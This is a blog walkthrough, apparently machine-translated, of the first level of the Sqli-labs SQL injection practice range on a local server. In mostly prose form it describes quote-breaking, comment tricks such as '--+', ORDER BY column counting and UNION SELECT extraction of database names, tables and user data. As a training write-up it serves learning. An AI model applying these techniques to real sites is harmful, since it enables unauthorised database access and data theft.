To say that SQL injection learning, the number of online shooting range, is Sqli labs this series is very good, the level reached more than 60 off, I also played a few off, a very good practice of SQL injection of the source code.
I was ready to wait for me from the beginning. After summing up some of the principles, I started to do this, after all, this involves the SQL injection knowledge is very full, I posted a: Sqli Labs series
Yes, and I have this series of the head of the figure, that figure is a low-key group of active users to install the X-Wall, pure X, entertainment play, we don't really ha.
Open the text to begin!
First we start the first level, and then construct the next injection environment, that is, after http://127.0.0.1/sqli-labs-master/Less-1/this add inderx.php?id=1, of course, we can also directly add? id=1 because the variable is id = 1, as long as there are variables on the line.
Start adding below.
After the addition, is not the data, then we can start to construct the injection statement.
As a rule, I'll enter and 1=1 after id=1 to determine if it will be displayed correctly.
The result is obvious, the display is correct, then I start to enter and 1=2 for the error test.
The result is not wrong, I began to wonder, I first constructs the next, probably is the SQL statement.
Then I started typing ' this point symbol, let it error, I think.
For I have been playing this, the error of a look, I know the reason is where, but we may not see, then I will change the error symbol, with this to replace '.
We copy the error message into our new text and analyze it.
See here, do not know that you can not see, I first guess, his SQL statement should be like this.
On the back of line 1 This is a verbatim view, we do not analyze this, only to analyze how to inject.
All right, I'm going to split the SQL statement for the error above, so that everyone can read it directly.
I'm pasting a.
Did you see it? Is the argument coerced into a string? We just have to put this ' to the front and back closed, not to be able to query it?
Here, you must think of the comment off the back of the line? Yes, just comment out. But since I often play, I just want to open two methods, one is closed, the other is a comment.
The first one is closed, the second is--the note, by the way, two bars must have a space after the comment effect, but I generally use + to replace the space,--+, such comments.
Okay, let's start testing the first one, and see if it's OK.
And 1=1, the display is correct, then I test and 1=2 again.
OK, as I thought, an error has been made.
Under the test, the annotation method.
and 1=1 show normal, then test and 1=2.
The error is displayed, so this will basically start my SQL injection Dafa!
I'm going to start injecting!!!
First of all to determine the number of fields, I started with the order by this query, the results of 100 have been checked not to error, that means this failure, I can only use the union Select this method to check, I checked a total of 3 fields.
Then I began to make an error, and 1=2 the union Select, prompting it to give an error.
Then start querying the library name, version number, user.
User.
The library name.
The version number.
As is more than 5.0, we can directly query.
I'll start by transcoding the current library name.
It then starts to burst all the table names.
I checked the name of the users and continued to transcode.
Then start exploding all the column names in the table name.
I chose two directly and started to explode the data directly.
The result is nothing, also reported wrong ...
Then I see the error prompt, decisive change the annotation method, comment out the back of the ....
Well, the data was successfully burst.
Ok first off, I pass.
Summarize:
I know my first write is very detailed, but more than 60 light, I am sure it is not finished, I play this in the time of nothing, play, play I will directly write a second post. And if you are a bit unfamiliar with my attack statement below, you can view the SQL injection attack principle analysis of MySQL database under this column for learning.
Address: MySQL Injection chapter
SQLI Labs Series-less-1 detailed article